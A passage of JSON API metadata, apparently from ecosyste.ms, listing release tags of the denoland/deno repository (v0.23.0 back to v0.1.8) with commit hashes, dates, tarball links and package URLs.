api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v